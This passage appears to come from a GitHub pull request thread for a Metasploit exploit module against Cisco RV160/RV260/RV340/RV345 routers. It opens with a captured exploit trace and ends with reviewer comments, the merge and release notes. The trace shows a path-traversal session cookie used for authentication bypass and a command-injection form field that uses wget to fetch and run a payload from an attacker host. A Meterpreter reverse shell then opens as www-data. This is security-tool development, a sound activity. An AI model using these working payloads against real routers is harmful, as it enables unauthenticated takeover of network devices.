Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.1; rv:108.0) Gecko/20100101 Firefox/108.0
Cookie: sessionid =../../www/index.html; sessionid=ojwtRksOCckYNv8h


####################
# Response:
####################
HTTP/1.1 405 Not Allowed
Server: nginx
Date: Mon, 13 Feb 2023 22:47:46 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 166
Connection: keep-alive
Keep-Alive: timeout=5
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000; includeSubDomains

<html>
<head><title>405 Not Allowed</title></head>
<body bgcolor="white">
<center><h1>405 Not Allowed</h1></center>
<hr><center>nginx</center>
</body>
</html>

[+] The target appears to be vulnerable. The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.
[*] Executing Linux Dropper for linux/armle/meterpreter/reverse_tcp
[*] Using URL: http://192.168.1.142:8080/ylswvFo
####################
# Request:
####################
POST /upload HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.1; rv:108.0) Gecko/20100101 Firefox/108.0
Cookie: sessionid =../../www/index.html; sessionid=JHUsmIuYa3FGFNpz
Content-Type: multipart/form-data; boundary=---------------------------434626557554054827140350507969
Content-Length: 993

-----------------------------434626557554054827140350507969
Content-Disposition: form-data; name="file.path"

/tmp/upload.input
-----------------------------434626557554054827140350507969
Content-Disposition: form-data; name="filename"

iDL3aG91YMMn
-----------------------------434626557554054827140350507969
Content-Disposition: form-data; name="pathparam"

Configuration
-----------------------------434626557554054827140350507969
Content-Disposition: form-data; name="fileparam"

o0GFjfoht
-----------------------------434626557554054827140350507969
Content-Disposition: form-data; name="destination"

'; wget -qO /tmp/eSuZUYEU http://192.168.1.142:8080/ylswvFo;chmod +x /tmp/eSuZUYEU;/tmp/eSuZUYEU;rm -f /tmp/eSuZUYEU #
-----------------------------434626557554054827140350507969
Content-Disposition: form-data; name="input"; filename="iDL3aG91YMMn"
Content-Type: application/octet-stream

X4G7IgYQB
-----------------------------434626557554054827140350507969--

[*] Client 192.168.1.1 (Wget) requested /ylswvFo
[*] Sending payload to 192.168.1.1 (Wget)
[*] Sending stage (934728 bytes) to 192.168.1.1
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Feb 2023 22:47:46 GMT
Content-Type: application/json;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=5
Content-Security-Policy: default-src 'self';
                                            data: ;
											ws: wss:;
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=31536000; includeSubDomains

<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

[+] Exploit successfully executed.
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Meterpreter session 2 opened (192.168.1.142:4444 -> 192.168.1.1:37787) at 2023-02-13 17:47:47 -0500
[*] Server stopped.

meterpreter > shell
Process 1027 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

2023-02-13 23:38 UTC, gwillcox-r7 commented on modules/exploits/linux/http/cisco_rv340_lan.rb
> +                'BadChars' => '\'#;'
Agreed, wasn't sure about this one being included so thanks for double checking that for me 👍

2023-02-13 23:48 UTC, gwillcox-r7 commented
@neterum Code looks good and matches the trace shown. Will go ahead and land this now, thanks for your time and effort on this!

2023-02-13 23:52 UTC, merged

2023-02-13 23:55 UTC, gwillcox-r7 commented
# Release Notes
An exploit for Cisco RV160, RV260, RV340 and RV345 Small Buisness Routers prior to firmware version 1.0.03.26 has been added which exploits CVE-2022-20705, an authentication bypass, and CVE-2022-20707, a command injection vulnerability, to achieve remote code execution as the `www-data` user on affected devices as a unauthenticated attacker.

2023-02-13 23:55 UTC, neterum commented
> @neterum Code looks good and matches the trace shown. Will go ahead and land this now, thanks for your time and effort on this!


Thanks for your time and patience on accepting my pull request.  I've learned a lot through this process.

2023-02-14 00:01 UTC, gwillcox-r7 commented
> > @neterum Code looks good and matches the trace shown. Will go ahead and land this now, thanks for your time and effort on this!
> 
> Thanks for your time and patience on accepting my pull request. I've learned a lot through this process.

No problem, and thanks for pointing out a few of my mistakes on the review, much appreciated 👍